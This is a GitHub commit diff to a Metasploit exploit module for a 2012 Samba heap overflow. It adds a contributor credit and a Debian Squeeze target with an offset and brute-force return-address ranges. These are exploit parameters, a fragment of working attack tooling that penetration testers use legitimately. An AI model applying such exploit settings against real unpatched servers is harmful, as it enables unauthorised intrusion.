We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 8b8bfec commit 4c64676Copy full SHA for 4c64676
modules/exploits/linux/samba/setinfopolicy_heap.rb
@@ -34,6 +34,7 @@ def initialize(info = {})
34
[
35
'Unknown', # Vulnerability discovery
36
'blasty', # Exploit
37
+ 'mephos', # Debian Squeeze target
38
'sinn3r', # Metasploit module
39
'juan vazquez' # Metasploit module
40
],
@@ -96,6 +97,18 @@ def initialize(info = {})
96
97
'Step' => 0x1000
98
}
99
100
+ ],
101
+ ['2:3.5.6~dfsg-3squeeze6 on Debian Squeeze',
102
+ {
103
+ 'Offset' => 0x11c0,
104
+ 'Bruteforce' =>
105
106
+ # The start should be 0x680 aligned, and then step 0x1000.
107
+ 'Start' => { 'Ret' => 0xb6aaa1b0 },
108
+ 'Stop' => { 'Ret' => 0xb6ce91b0 },
109
+ 'Step' => 0x1000
110
+ }
111
112
]
113
114
'DisclosureDate' => 'Apr 10 2012',
0 commit comments